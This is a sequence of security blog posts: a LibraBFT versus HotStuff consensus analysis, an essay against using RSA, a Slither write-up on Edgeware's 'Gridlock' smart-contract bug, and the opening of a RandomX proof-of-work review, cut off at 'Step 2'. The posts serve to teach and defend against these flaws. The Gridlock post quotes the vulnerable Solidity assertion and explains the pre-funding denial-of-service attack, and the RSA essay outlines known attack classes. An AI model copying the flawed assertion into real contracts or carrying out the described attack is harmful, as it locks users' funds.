LibraBFT is the Byzantine Fault Tolerant (BFT) consensus algorithm used by the recently released Libra cryptocurrency. LibraBFT is based on another BFT consensus algorithm called HotStuff. While some have noted the similarities between the two algorithms, they differ in some crucial respects. In this post we highlight one such difference: in LibraBFT, non-leaders perform broadcasts. This has implications on liveness analysis, communication complexity, and leader election. We delve into each of these topics following a brief review of what BFT consensus algorithms are and why they are useful.

A brief history of BFT consensus algorithms

The term Byzantine Fault Tolerant (BFT) originates from a paper by Lamport, Shostak, and Pease. In that paper, the authors consider a fictional scenario in which a group of Byzantine generals are considering whether to attack a city. The problem is that some of the generals are traitors. The question is, if the traitors spread misinformation, then under what conditions can the group agree to attack or retreat from the city? Note that neither attacking nor retreating is considered more favorable than the other: the problem is simply to agree on one action!

This scenario is a metaphor for one that commonly arises in distributed systems: the generals are nodes in a network, the traitors are faulty nodes, and attacking the city is, say, committing a transaction to a database.

The Lamport et al. paper proposes a solution to this problem. However, the solution implicitly assumes a synchronous network, which means that messages between nodes are delivered within a fixed, known time bound. Compare this to an asynchronous network, where messages can be arbitrarily delayed and even reordered.

Dwork, Lynch, and Stockmeyer were the first to propose deterministic algorithms that solve the Byzantine generals problem for “partially synchronous” networks. (Earlier, Rabin and Ben-Or had proposed randomized algorithms.) Dwork et al.’s analysis of what it means for a network to be “partially synchronous” was a significant contribution to the study of BFT algorithms. However, the purpose of Dwork et al.’s algorithms appears to have been to establish the existence of such solutions. Thus, their algorithms are of more theoretical than practical interest.

Toward the end of the century, Castro and Liskov proposed a solution on which many contemporary algorithms have been based (e.g., Tendermint, described below). Castro and Liskov’s algorithm, called Practical Byzantine Fault Tolerance (PBFT) works as follows. Each round has a designated leader chosen from among the nodes, and each round is composed of three phases. Roughly, in the first phase, the leader proposes a command for all nodes to execute; in the second phase, the nodes vote on the command; and in the third phase, the nodes acknowledge receipt of each others’ votes and execute the command. When a node believes that a round has gone on for too long, it sends a timeout message to all other nodes. Nodes must agree that a round should timeout. The process is somewhat complicated. PBFT, as a whole, works up to when ⌊(n-1)/3⌋ of the n nodes are faulty, which is the best that one can do.

In order to circumvent a classic impossibility result of Fischer, Lynch, and Paterson, PBFT prioritizes safety over liveness. This means that, say, a leader could propose a command and that command could fail to be executed, e.g., because of network problems. However, the algorithm is safe in the sense that if two non-faulty nodes execute some sequence of commands, then one is necessarily a prefix of the other.

It is interesting to note how PBFT uses broadcasts. During the first phase of each round, the leader broadcasts to all nodes. But, during the second and third phases, all nodes (not just the leader) broadcast to one another.

Figure 1 from the PBFT paper, which calls the three phases of each round “pre-prepare,” “prepare,” and “commit.” The numbers represent network nodes and the arrows represent messages. Note how non-leader nodes 1 and 2 broadcast to all other nodes during the second and third phases.

Many variants of PBFT have been proposed. One notable example is Tendermint. Like PBFT, Tendermint proceeds in rounds, each round is divided into three phases, and the use of broadcasts in each phase is similar. However, whereas timeouts in PBFT occur with respect to entire rounds, timeouts in Tendermint occur with respect to individual phases, which many regard as a simpler strategy. (See here for additional discussion.) Also, Tendermint has a well-tested implementation that is actively developed. For this reason, if none other, Tendermint has seen widespread use.

HotStuff may also be regarded as a variant of PBFT. The HotStuff algorithm is “pipelined” so that timing out in a round is essentially no different than timing out in a phase. But perhaps HotStuff’s most notable improvement over PBFT is its reduced “authenticator complexity.” As defined in the HotStuff paper, “an authenticator is either a partial signature or a signature” (page 4). The paper argues that “Authenticator complexity is a useful measure of communication complexity… it hides unnecessary details about the transmission topology… n messages carrying one authenticator count the same as one message carrying n authenticators.”

HotStuff achieves reduced authenticator complexity, in part, by using threshold signatures. This allows non-leaders to send their messages to only the leader and not to one another. For example, when voting on a command, nodes in HotStuff send their “share” of a signature to the leader. Once the leader has accumulated 2⌊(n-1)/3⌋ + 1 such shares, it broadcasts the combined signature to all other nodes. The other phases of the HotStuff algorithm are similar. In this way, HotStuff achieves linear authenticator complexity.


LibraBFT is the consensus algorithm used by the Libra cryptocurrency. LibraBFT is based on HotStuff. According to the Libra authors, there were “three reasons for selecting the HotStuff protocol as the basis for LibraBFT: (1) simplicity and modularity of the safety argument; (2) ability to easily integrate consensus with execution; and (3) promising performance in early experiments.”

LibraBFT and HotStuff are very similar. For example, LibraBFT retains HotStuff’s pipelined design. Furthermore, when voting on a command (or “block” to use LibraBFT’s terminology), nodes send their votes to only the leader and not to all other nodes.

Figure 3 from the LibraBFT paper. The letters B, V, and C are mnemonic for “block,” “vote,” and “[quorum] certificate,” respectively. Note how nodes send their votes to only the leader (like in HotStuff) and do not broadcast them to all other nodes (like in PBFT). On the other hand, note the caption, which indicates that “round synchronization” is not reflected in the figure. Round synchronization does involve broadcasts.

However, to achieve certain goals (explained below), LibraBFT uses broadcasts in ways that HotStuff does not. (In this way, LibraBFT resembles its distant ancestor, PBFT.) Specifically, LibraBFT requires non-leader nodes to perform broadcasts under the following circumstances:

  1. Nodes regularly synchronize their states using broadcasts.
  2. When a timeout is reached, e.g., because of network problems or a faulty leader, nodes send a timeout message to all other nodes.

The use of broadcasts for state synchronization makes it easier to establish a liveness result for LibraBFT. The reason for broadcasting timeouts is not given in the LibraBFT paper. However, as we explain below, we suspect it is to allow for the future use of an adaptive leader election mechanism. Despite these advantages, the additional broadcasts have the unfortunate side-effect of increasing the algorithm’s communication complexity. However, such an increase in communication complexity may be unavoidable. (Neither the state synchronization broadcasts nor the timeout broadcasts should affect the algorithm’s safety.)

Note: A recent blog post entitled “Libra: The Path Forward” makes clear that LibraBFT is a work-in-progress. Perhaps for this reason, there are discrepancies between LibraBFT as defined in the LibraBFT paper and as implemented in the Libra source code. For the remainder of this blog post, we focus on the former. We point out a couple of the differences between the LibraBFT specification and the Libra source code below. (Also note that, while the LibraBFT paper does contain code, that code is not part of Libra itself, but of a simulator. The LibraBFT authors “intend to share the code for this simulator and provide experimental results in a subsequent version of the report” (page 4). That version of the report has not yet been released.)

Liveness analysis

In LibraBFT, “nodes broadcast their states at least once per period of time [the minimum broadcast interval] 𝐼 > 0” (page 22). No similar notion exists in HotStuff. Unsurprisingly, this makes it easier to establish a liveness result for LibraBFT. However, liveness analysis of the two algorithms differ in other ways, as we now explain.

HotStuff’s liveness theorem asserts that, under certain technical conditions including that the round leader is non-faulty, there exists a time bound within which all non-faulty nodes execute a command and move on to the next round. The liveness theorem is parameterized by two functions: Leader and NextView. Leader is a function of the round number and determines the leader of that round. The arguments of NextView are not given specifically, but include at least the round number. NextView determines when round timeout “interrupts” are generated.

HotStuff’s liveness theorem

LibraBFT’s liveness theorem has a similar form. However, there are two significant differences. First, LibraBFT’s analogs of the Leader and NextView functions are not left as parameters, but are given explicitly. Second, the time bound within which a command is executed is not merely to asserted to exist, but is also given explicitly.


LibraBFT’s liveness theorem

Of note is the fact that LibraBFT’s explicit time bound features 𝐼, the minimum broadcast interval, mentioned above. The appearance of 𝐼 demonstrates that LibraBFT’s liveness analysis differs fundamentally from that of HotStuff, and is not merely a byproduct of explicitly given Leader and NextView mechanisms.

We would also point out that this is a place where LibraBFT specification and the Libra source code do not exactly match. In LibraBFT, nodes broadcast their states to one another using DataSyncNotification messages (defined in Appendix A.3 of the LibraBFT paper). Nothing analogous to a DataSyncNotification message seems to exist within the Libra source code. For example, if one looks at the start_event_processing function from Libra’s chained_bft module, one can see calls to functions that process proposals, votes, etc. However, there is no call that would seem to process something resembling a DataSyncNotification message.

fn start_event_processing(
    event_processor: ConcurrentEventProcessor,
    executor: TaskExecutor,
) {

An excerpt of the “start_event_processing” function from Libra’s “chained_bft” module. Note that none of the calls seem to process something resembling a LibraBFT DataSyncNotification message.

The bottom line is that the LibraBFT liveness analysis does not directly apply to the LibraBFT source code in its present form. However, as mentioned above, LibraBFT is a work-in-progress. So, the existence of some discrepancies between the LibraBFT specification and the Libra source code is not surprising.

Communication complexity

As mentioned above in the description of HotStuff, HotStuff achieves linear authenticator complexity, where “an authenticator is either a partial signature or a signature” sent in a network message in a single round. What is LibraBFT’s authenticator complexity? It is unclear and somewhat ambiguous.

The LibraBFT paper does not mention “authenticator complexity” specifically, though it does claim that “LibraBFT has two desirable properties that BFT consensus protocols preceding HotStuff were not able to simultaneously support — linearity and responsiveness. … Informally, linearity guarantees that driving transaction commits incurs only linear communication…” (page 2). The claim is not addressed later in the paper. As we argue, LibraBFT’s authenticator complexity is at least O(n2), where n is the number of nodes. So, either the authors were not referring to authenticator complexity, or the claim is some sort of an oversight.

When a LibraBFT node believes that a round has gone on for too long, it broadcasts a timeout message to all other nodes. These timeout messages are signed. Therefore, LibraBFT’s authenticator complexity is at least O(n2).

How does LibraBFT’s use of broadcasts in state synchronization affect authenticator complexity?

State synchronization is parameterized by the minimum broadcast interval, 𝐼, mentioned above in the discussion of liveness analysis. The LibraBFT paper states that “nodes broadcast their states at least once per period of time 𝐼 > 0” (page 22). Taking this into account, the authenticator complexity of LibraBFT should be not just a function of n, but also of 𝐼.

However, the paper’s Appendix A.3 states “we have assumed that [data-synchronization messages] are transmitted over authenticated channels and omitted message signatures” (page 36). One could use this fact to argue that data synchronization does not affect authenticator complexity (though, that would feel a lot like cheating).

So, LibraBFT’s authenticator complexity is at least O(n2) due to its use of timeout broadcasts. It could be more, depending upon one’s assumptions about the network.

To be clear, this is a worst case analysis. In the common case, timeouts will not occur. Thus, if 𝐼 is large, say, many multiples of the typical round duration, then LibraBFT’s performance will be close to linear.

One final point is worth mentioning. HotStuff uses a predictable leader election strategy. As explained in the next section, the Libra authors are trying to avoid using such a strategy. To the best of our knowledge, no sub-quadratic adaptive leader election strategy currently exists. Thus, in comparing the communication complexity of HotStuff and LibraBFT, some increase may be unavoidable.

Leader election

At the time of this writing, the Libra source code’s leader election strategy is round-robin. However, the LibraBFT authors note that this strategy makes round leaders predictable, which facilitates denial-of-service attacks. In considering alternatives, the authors note that depending on hashes in a naive way could facilitate “grinding attacks,” e.g., where an attacker influences the hash in such a way as to increase the likelihood of a particular node being selected the leader.

To address the former problem and circumvent the latter, the authors state, “we intend to use a verifiable random function (VRF) in the future.” (In fact, a VRF is already implemented in the Libra source code, though it does not yet seem to be used.) In the next two paragraphs, we explain what VRFs are. Then, following a brief explanation of what it means for a LibraBFT block to be “committed,” we explain how LibraBFT’s proposed use of VRFs in leader elections is enabled by its use of broadcasts.

Intuitively, a VRF is a function that, given some input, produces two outputs: a random-looking value, and a proof that the value was derived from the input. The function is expected to have two properties. First, it should not be obvious how the random-looking value was derived from the input. Second, it should be possible to convince an observer that the random-looking value was derived from the input, even though that fact is not obvious. This latter property is made possible via the proof.

A simple example of a VRF is given in Section 4 of Goldberg, Reyzin, Papadopoulos, and Vcelak’s draft RFC. In that example, the random-looking value is an RSA signature computed over the hash of the input, and the proof is the hash. An observer can verify the proof by checking that the input has the hash, and that the signature corresponds to the hash. (Note: for production code, we recommend using the elliptic-curve-based VRF of Section 5 of the RFC, and not the RSA-based VRF of Section 4.)

We now briefly explain what it means for a LibraBFT block to be “committed.” In LibraBFT, blocks and quorum certificates alternate to form a chain:

B0 ← C0 ← B1 ← C1 ← B2 ← C2 ← ⋯

These blocks (certificates) need not be proposed (assembled) in contiguous rounds; there could be arbitrarily large gaps between them. A block is said to be “committed” when: (1) it appears below two other blocks, (2) all three blocks have associated quorum certificates, and (3) the blocks were proposed in contiguous rounds.

The reason for this rule is a bit technical. But, intuitively, a “committed” block is considered permanent by all non-faulty nodes. In contrast, a block that appears below fewer than two certified blocks is considered impermanent, and may have to be abandoned in favor of another block.

The LibraBFT authors intend to use VRFs in leader elections as follows. Each node will have its own instance of some VRF (e.g., a VRF instantiated with a private key belonging to the node). The leader for round i will be determined using the VRF instance of the round leader for the most recently committed block. That VRF instance will determine a seed for a pseudo-random function (PRF). The resulting PRF instance will then determine the leader for round i and each subsequent round until a new block becomes committed. The reason for using two functions like this is (we believe) so that round leaders can be determined even if the proposer of the most recently committed block goes offline.

We now explain how LibraBFT’s proposed use of VRFs in leader elections is enabled by its use of broadcasts. Or, more specifically, we explain why LibraBFT’s proposed use of VRFs would not work if a node could send a timeout message to just one other node, as is the case in HotStuff. The purpose of a timeout message is to tell the next round leader to start the next round. But, as we show in the next several paragraphs, who that next leader is can depend upon the cause of the timeout.

Suppose that in contiguous rounds i-2, i-1, and i, blocks Bm-2, Bm-1, and Bm are proposed. Further suppose that the leader for round i assembles a quorum certificate Cm and broadcasts it to all other nodes. Thus, at the start of round i+1, the most recently committed block is Bm-2:

B0 ← C0 ← ⋯ ← Bm-2 ← Cm-2 ← Bm-1 ← Cm-1 ← Bm ← Cm

But suppose that the leader for round i does not receive a block proposal for round i+1 within a reasonable timeframe. If the leader for round i could send a timeout message to just one other node, to whom should she send it? (Note that the leader for round i plays no special role in detecting or announcing the timeout of round i+1.)

Consider the following two explanations for why the leader for round i does not receive a block proposal for round i+1.

  • Case 1: The leader for round i+1 is faulty and never proposed a block. In this case, the most recently committed block at round i+2 is still Bm-2. Thus, the leader for round i+2 should be determined by the same PRF instance that determined the leader for round i+1. If the leader for round i could send a timeout message to just one other node, she should send it to the leader determined by this existing PRF instance.
  • Case 2: There is a network delay. The leader for round i+1 proposed a block and assembled a quorum certificate, but the leader for round i did not receive them in time. In this case, the most recently committed block at round i+2 is Bm-1. Thus, the leader for round i+2 should be determined by a new PRF instance, one seeded by the VRF instance belonging to the proposer of Bm-1. If the leader for round i could send a timeout message to just one other node, she should send it to the leader determined by this new PRF instance.

This ambiguity is resolved by having the leader for round i send its timeout message to all other nodes. We would not be surprised if the LibraBFT authors introduced timeout broadcasts to address this type of scenario specifically.

Finally, note that a similar problem does not exist in HotStuff. In HotStuff, the round leader is determined by “some deterministic mapping from view number to a replica, eventually rotating through all replicas,” and does not depend on the most recently committed block. On the other hand, the predictability of round leaders makes HotStuff susceptible to denial-of-service attacks, which the LibraBFT authors are trying to avoid.

LibraBFT and HotStuff are distinct algorithms

LibraBFT and HotStuff are very similar, but the two algorithms differ in some crucial respects. In LibraBFT, non-leaders perform broadcasts. The use of broadcasts in state synchronization makes it easier to establish a liveness result for LibraBFT. We suspect that timeout broadcasts were introduced to allow for the future use of an adaptive leader election mechanism, e.g., one based on VRFs. Despite these advantages, the additional broadcasts increase the algorithm’s communication complexity. However, this increase in communication complexity may be unavoidable.

We intend to keep a close eye on Libra. If you are developing a Libra application, please consider us for your security review.

Updated July 16, 2019.

Seriously, stop using RSA

Here at Trail of Bits we review a lot of code. From major open source projects to exciting new proprietary software, we’ve seen it all. But one common denominator in all of these systems is that for some inexplicable reason people still seem to think RSA is a good cryptosystem to use. Let me save you a bit of time and money and just say outright—if you come to us with a codebase that uses RSA, you will be paying for the hour of time required for us to explain why you should stop using it.

RSA is an intrinsically fragile cryptosystem containing countless foot-guns which the average software engineer cannot be expected to avoid. Weak parameters can be difficult, if not impossible, to check, and its poor performance compels developers to take risky shortcuts. Even worse, padding oracle attacks remain rampant 20 years after they were discovered. While it may be theoretically possible to implement RSA correctly, decades of devastating attacks have proven that such a feat may be unachievable in practice.

What is RSA again?

RSA is a public-key cryptosystem that has two primary use cases. The first is public key encryption, which lets a user, Alice, publish a public key that allows anyone to send her an encrypted message. The second use case is digital signatures, which allow Alice to “sign” a message so that anyone can verify the message hasn’t been tampered with. The convenient thing about RSA is that the signing algorithm is basically just the encryption algorithm run in reverse. Therefore for the rest of this post we’ll often refer to both as just RSA.

To set up RSA, Alice needs to choose two primes p and q that will generate the group of integers modulo N = pq. She then needs to choose a public exponent e and private exponent d such that ed = 1 mod (p-1)(q-1). Basically, e and d need to be inverses of each other.

Once these parameters have been chosen, another user, Bob, can send Alice a message M by computing C = Me (mod N). Alice can then decrypt the ciphertext by computing M = Cd (mod N). Conversely, if Alice wants to sign a message M, she computes S = Md (mod N), which any user can verify was signed by her by checking M = Se (mod N).

That’s the basic idea. We’ll get to padding—essential for both use cases—in a bit, but first let’s see what can go wrong during parameter selection.

Setting yourself up for failure

RSA requires developers to choose quite a few parameters during setup. Unfortunately, seemingly innocent parameter-selection methods degrade security in subtle ways. Let’s walk through each parameter choice and see what nasty surprises await those who choose poorly.

Prime Selection

RSA’s security is based off the fact that, given a (large) number N that’s the product of two primes p and q, factoring N is hard for people who don’t know p and q. Developers are responsible for choosing the primes that make up the RSA modulus. This process is extremely slow compared to key generation for other cryptographic protocols, where simply choosing some random bytes is sufficient. Therefore, instead of generating a truly random prime number, developers often attempt to generate one of a specific form. This almost always ends badly.

There are many ways to choose primes in such a way that factoring N is easy. For example, p and q must be globally unique. If p or q ever gets reused in another RSA moduli, then both can be easily factored using the GCD algorithm. Bad random number generators make this scenario somewhat common, and research has shown that roughly 1% of TLS traffic in 2012 was susceptible to such an attack. Moreover, p and q must be chosen independently. If p and q share approximately half of their upper bits, then N can be factored using Fermat’s method. In fact, even the choice of primality testing algorithm can have security implications.

Perhaps the most widely-publicized prime selection attack is the ROCA vulnerability in RSALib which affected many smartcards, trusted platform modules, and even Yubikeys. Here, key generation only used primes of a specific form to speed up computation time. Primes generated this way are trivial to detect using clever number theory tricks. Once a weak system has been recognized, the special algebraic properties of the primes allow an attacker to use Coppersmith’s method to factor N. More concretely, that means if the person sitting next to me at work uses a smartcard granting them access to private documents, and they leave it on their desk during lunch, I can clone the smartcard and give myself access to all their sensitive files.

It’s important to recognize that in none of these cases is it intuitively obvious that generating primes in such a way leads to complete system failure. Really subtle number-theoretic properties of primes have a substantial effect on the security of RSA. To expect the average developer to navigate this mathematical minefield severely undermines RSA’s safety.

Private Exponent

Since using a large private key negatively affects decryption and signing time, developers have an incentive to choose a small private exponent d, especially in low-power settings like smartcards. However, it is possible for an attacker to recover the private key when d is less than the 4th root of N. Instead, developers are encouraged to choose a large d such that Chinese remainder theorem techniques can be used to speed up decryption. However, this approach’s complexity increases the probability of subtle implementation errors, which can lead to key recovery. In fact, one of our interns last summer modelled this class of vulnerabilities with our symbolic execution tool Manticore.

People might call me out here and point out that normally when setting up RSA you first generate a modulus, use a fixed public exponent, and then solve for the private exponent. This prevents low private exponent attacks because if you always use one of the recommended public exponents (discussed in the next section) then you’ll never wind up with a small private exponent. Unfortunately this assumes developers actually do that. In circumstances where people implement their own RSA, all bets are off in terms of using standard RSA setup procedures, and developers will frequently do strange things like choose the private exponent first and then solve for the public exponent.

Public Exponent

Just as in the private exponent case, implementers want to use small public exponents to save on encryption and verification time. It is common to use Fermat primes in this context, in particular e = 3, 17, and 65537. Despite cryptographers recommending the use of 65537, developers often choose e = 3 which introduces many vulnerabilities into the RSA cryptosystem.

Developers have even used e = 1, which doesn’t actually encrypt the plaintext

When e = 3, or a similarly small number, many things can go wrong. Low public exponents often combine with other common mistakes to either allow an attacker to decrypt specific ciphertexts or factor N. For instance, the Franklin-Reiter attack allows a malicious party to decrypt two messages that are related by a known, fixed distance. In other words, suppose Alice only sends “chocolate” or “vanilla” to Bob. These messages will be related by a known value and allow an attacker Eve to determine which are “chocolate” and which are “vanilla.” Some low public exponent attacks even lead to key recovery. If the public exponent is small (not just 3), an attacker who knows several bits of the secret key can recover the remaining bits and break the cryptosystem. While many of these e = 3 attacks on RSA encryption are mitigated by padding, developers who implement their own RSA fail to use padding at an alarmingly high rate.

RSA signatures are equally brittle in the presence of low public exponents. In 2006, Bleichenbacher found an attack which allows attackers to forge arbitrary signatures in many RSA implementations, including the ones used by Firefox and Chrome. This means that any TLS certificate from a vulnerable implementation could be forged. This attack takes advantage of the fact that many libraries use a small public exponent and omit a simple padding verification check when processing RSA signatures. Bleichenbacher’s signature forgery attack is so simple that it is a commonly used exercise in cryptography courses.

Parameter Selection is Hard

The common denominator in all of these parameter attacks is that the domain of possible parameter choices is much larger than that of secure parameter choices. Developers are expected to navigate this fraught selection process on their own, since all but the public exponent must be generated privately. There are no easy ways to check that the parameters are secure; instead developers need a depth of mathematical knowledge that shouldn’t be expected of non-cryptographers. While using RSA with padding may save you in the presence of bad parameters, many people still choose to use broken padding or no padding at all.

Padding oracle attacks everywhere

As we mentioned above, just using RSA out of the box doesn’t quite work. For example, the RSA scheme laid out in the introduction would produce identical ciphertexts if the same plaintext were ever encrypted more than once. This is a problem, because it would allow an adversary to infer the contents of the message from context without being able to decrypt it. This is why we need to pad messages with some random bytes. Unfortunately, the most widely used padding scheme, PKCS #1 v1.5, is often vulnerable to something called a padding oracle attack.

Padding oracles are pretty complex, but the high-level idea is that adding padding to a message requires the recipient to perform an additional check–whether the message is properly padded. When the check fails, the server throws an invalid padding error. That single piece of information is enough to slowly decrypt a chosen message. The process is tedious and involves manipulating the target ciphertext millions of times to isolate the changes which result in valid padding. But that one error message is all you need to eventually decrypt a chosen ciphertext. These vulnerabilities are particularly bad because attackers can use them to recover pre-master secrets for TLS sessions. For more details on the attack, check out this excellent explainer.

The original attack on PKCS #1 v1.5 was discovered way back in 1998 by Daniel Bleichenbacher. Despite being over 20 years old, this attack continues to plague many real-world systems today. Modern versions of this attack often involves a padding oracle slightly more complex than the one originally described by Bleichenbacher, such as server response time or performing some sort of protocol downgrade in TLS. One particularly shocking example was the ROBOT attack, which was so bad that a team of researchers were able to sign messages with Facebook’s and PayPal’s secret keys. Some might argue that this isn’t actually RSA’s fault – the underlying math is fine, people just messed up an important standard several decades ago. The thing is, we’ve had a standardized padding scheme with a rigorous security proof, OAEP, since 1998. But almost no one uses it. Even when they do, OAEP is notoriously difficult to implement and often is vulnerable to Manger’s attack, which is another padding oracle attack that can be used to recover plaintext.

The fundamental issue here is that padding is necessary when using RSA, and this added complexity opens the cryptosystem up to a large attack surface. The fact that a single bit of information, whether the message was padded correctly, can have such a large impact on security makes developing secure libraries almost impossible. TLS 1.3 no longer supports RSA so we can expect to see fewer of these attacks going forward, but as long as developers continue to use RSA in their own applications there will be padding oracle attacks.

So what should you use instead?

People often prefer using RSA because they believe it’s conceptually simpler than the somewhat confusing DSA protocol or moon math elliptic curve cryptography (ECC). But while it may be easier to understand RSA intuitively, it lacks the misuse resistance of these other more complex systems.

First of all, a common misconception is that ECC is super dangerous because choosing a bad curve can totally sink you. While it is true that curve choice has a major impact on security, one benefit of using ECC is that parameter selection can be done publicly. Cryptographers make all the difficult parameter choices so that developers just need to generate random bytes of data to use as keys and nonces. Developers could theoretically build an ECC implementation with terrible parameters and fail to check for things like invalid curve points, but they tend to not do this. A likely explanation is that the math behind ECC is so complicated that very few people feel confident enough to actually implement it. In other words, it intimidates people into using libraries built by cryptographers who know what they’re doing. RSA on the other hand is so simple that it can be (poorly) implemented in an hour.

Second, any Diffie-Hellman based key agreement or signature scheme (including elliptic curve variants) does not require padding and therefore completely sidesteps padding oracle attacks. This is a major win considering RSA has had a very poor track record avoiding this class of vulnerabilities.

Trail of Bits recommends using Curve25519 for key exchange and digital signatures. Encryption needs to be done using a protocol called ECIES which combines an elliptic curve key exchange with a symmetric encryption algorithm. Curve25519 was designed to entirely prevent some of the things that can go wrong with other curves, and is very performant. Even better, it is implemented in libsodium, which has easy-to-read documentation and is available for most languages.

Seriously, stop using RSA

RSA was an important milestone in the development of secure communications, but the last two decades of cryptographic research have rendered it obsolete. Elliptic curve algorithms for both key exchange and digital signatures were standardized back in 2005 and have since been integrated into intuitive and misuse-resistant libraries like libsodium. The fact that RSA is still in widespread use today indicates both a failure on the part of cryptographers for not adequately articulating the risks inherent in RSA, and also on the part of developers for overestimating their ability to deploy it successfully.

The security community needs to start thinking about this as a herd-immunity problem—while some of us might be able to navigate the extraordinarily dangerous process of setting up or implementing RSA, the exceptions signal to developers that it is in some way still advisable to use RSA. Despite the many caveats and warnings on StackExchange and Github READMEs, very few people believe that they are the ones who will mess up RSA, and so they proceed with reckless abandon. Ultimately, users will pay for this. This is why we all need to agree that it is flat out unacceptable to use RSA in 2019. No exceptions.

Avoiding Smart Contract “Gridlock” with Slither

A denial-of-service (DoS) vulnerability, dubbed ‘Gridlock,’ was publicly reported on July 1st in one of Edgeware’s smart contracts deployed on Ethereum. As much as $900 million worth of Ether may have been processed by this contract. Edgeware has since acknowledged and fixed the “fatal bug.”

When we heard about Gridlock, we ran Slither on the vulnerable and fixed Edgeware contracts. Its publicly available dangerous-strict-equality detector correctly identifies the dangerous assertion in the vulnerable contract, and shows the absence of this vulnerability in the fixed contract.

This blog post details why this vulnerability is so subtle, the implementation details behind Slither’s dangerous-strict-equality detector that identified this vulnerability, and how Slither can help prevent developers from introducing such vulnerabilities in the future.

Strict Equality and DoS Vulnerability

The Gridlock vulnerability was identified in the snippet below. Upon discovery, the bug was acknowledged by the maintainers and a second version addressing the issue was deployed.

     * @dev        Locks up the value sent to contract in a new Lock
     * @param      term         The length of the lock up
     * @param      edgewareAddr The bytes representation of the target edgeware key
     * @param      isValidator  Indicates if sender wishes to be a validator
    function lock(Term term, bytes calldata edgewareAddr, bool isValidator)
        uint256 eth = msg.value;
        address owner = msg.sender;
        uint256 unlockTime = unlockTimeForTerm(term);
        // Create ETH lock contract
        Lock lockAddr = (new Lock).value(eth)(owner, unlockTime);
        // ensure lock contract has all ETH, or fail
        assert(address(lockAddr).balance == msg.value); // BUG
        emit Locked(owner, eth, lockAddr, term, edgewareAddr, isValidator, now);

Specifically, the source of this vulnerability is the assertion which performs a strict equality check between the balance of the newly created Lock contract and the msg.value sent to this contract.

From the contract developer’s perspective, this assertion should hold. The new Lock contract was just created in the previous line. Also, it was credited with an Ether value equal to the msg.value sent as part of the current transaction.

However, this assumes that the newly created Lock contract address will have zero Ether balance before its creation. This is incorrect. Ether can be sent to contract addresses before the contracts are instantiated at those addresses. This is possible because Ethereum address generation is based on deterministic nonces.

The DoS attack consists of pre-calculating the next Lock contract address and sending some Wei to that address. This forces the lock() function to fail at the assertion in all future transactions, bringing the contract to a “Gridlock.”

The fix is to replace the assertion with the one below, where the strict equality ‘==’ is replaced by ‘>=’, accounting for Ether already present at the address of the new Lock contract being created.

assert(address(lockAddr).balance >= msg.value);

Avoiding strict equality to determine if an account has enough Ethers or tokens is a well-understood defensive programming technique in Solidity.

Slither’s Dangerous-Strict-Equality Detector

Slither has had a publicly available dangerous-strict-equality detector targeting this vulnerability since version 0.5.0, released on January 14th, 2019. We classify results from this detector as Medium impact and High confidence because strict equality is nearly always misused in logic fundamental to the operation of the contract. The results of this check are worth reviewing closely!

Running Slither on the Lockdrop.sol contract immediately identifies the vulnerable assertion:

$ slither --detect incorrect-equality Lockdrop.sol 
Lockdrop.lock(Lockdrop.Term,bytes,bool) (Lockdrop.sol#53-67) uses a dangerous strict equality:
        - assert(bool)(address(lockAddr).balance == msg.value)
INFO:Slither:Lockdrop.sol analyzed (2 contracts), 1 result(s) found

This detector is implemented using a lightweight taint analysis, where the tainted sources are program constructs with msg.value, now, block.number, block.timestamp, and the results of ERC token balanceOf() function calls. The taint sinks are expressions using strict equality comparisons, i.e., ‘==‘. The analysis works on Slither’s intermediate language representation, SlithIR, and tracks the propagation of tainted values across assignments and function calls. An alert is generated when the taint sinks have a data dependency on the tainted sources.

A simple textual search might have caught this vulnerability, but syntactic regular expressions would raise a fog of false alerts or miss it entirely. This is because of the many ways this vulnerability pattern can manifest, including across function calls and variable assignments. Hardcoding such a regular expression is challenging. Other security tools lack a detector for this vulnerability, or produce a substantial number of false positives. The lightweight semantic taint analysis enabled by SlithIR greatly improves this detector’s accuracy and reduces false positives.

In the case of the Lockdrop contract, Slither’s dangerous-strict-equality detector generates such an alert because msg.value and an address balance are used in a strict equality comparison within an assertion. This is a textbook example of a strict equality vulnerability which is caught effortlessly by Slither. We also verified that this alert is not present in the recently fixed code. correctly identifies “Gridlock” in the Edgeware smart contracts

Besides this detector, Slither has 35 more that catch many Solidity smart contract vulnerabilities. They work together with 30 additional proprietary detectors in, our continuous assurance system (think “Travis-CI but for Ethereum”). So, go ahead and give Slither a shot. We would love to hear about your experience, and welcome feedback.

State of the Art Proof-of-Work: RandomX

RandomX is a new ASIC and GPU-resistant proof-of-work (PoW) algorithm originally developed for Monero, but potentially useful in any blockchain using PoW that wants to bias towards general purpose CPUs. Trail of Bits was contracted by Arweave to review this novel algorithm in a two person-week engagement and provide guidance on alternate parameter selection. But what makes it unusual and why should you care about it?

Standard Proof-of-work

In classical PoW algorithms (such as hashcash, used in Bitcoin), the core is typically a cryptographic hash function where the only variable is the data input to the function. To achieve a target “hardness” a number of zero bits are required as the prefix of the hash output. Each zero bit added doubles the difficulty of mining. However, this type of algorithm is highly amenable to acceleration via ASICs and GPUs because a fixed set of operations are performed on all input with limited memory requirements. This is undesirable.

Why do we care about ASIC resistance?

Blockchain mining is ideally a heavily decentralized task with no singular entity controlling a significant amount of the hashing power. Blockchains are susceptible to 51% attacks, where a malicious majority can override the global state, e.g., allowing double-spends. If an ASIC can be built that significantly improves mining efficiency over a general purpose CPU, then economic factors will disincentivize CPU-based mining. The result of this can be seen in the Bitcoin network, where ASIC manufacturers have built large-scale mining farms and a handful of entities control a shockingly high percentage of the hash rate.

For the last several years, ASIC manufacturers have shown great capacity for rapid design and fabrication of ASICs. A project that wants to be ASIC-resistant (without switching to a proof-of-stake model, which has its own set of tradeoffs) must therefore seek to take advantage of the specific strengths a general-purpose CPU possesses over a hypothetical ASIC.

This desire has led to a significant amount of research around ASIC resistance. RandomX represents a concrete implementation of the most modern ASIC-resistant ideas as applied to cryptocurrency.

How RandomX works

The core of RandomX is the concept of randomized execution. Put simply, we want to execute a series of random instructions to take advantage of a general-purpose CPU’s flexibility with dynamic code execution. The RandomX developers have extensively documented their design rationale and provided a specification with a more rigorous explanation, but with some simplification the algorithm does the following:

Step 1

A data structure called the Cache is created using argon2d with the input key K. Argon2d was originally designed as a memory-hard password hashing function. Computers generally have large pools of fast memory available to them, but memory is expensive on an ASIC. Requiring large amounts of memory is one of the most common defenses against specialized hardware. Argon2 uses a variety of techniques to ensure that a large (configurable) quantity of memory is used and that any time/memory tradeoff attacks are ineffective. You can read more about them in the argon2 specification.

Step 2

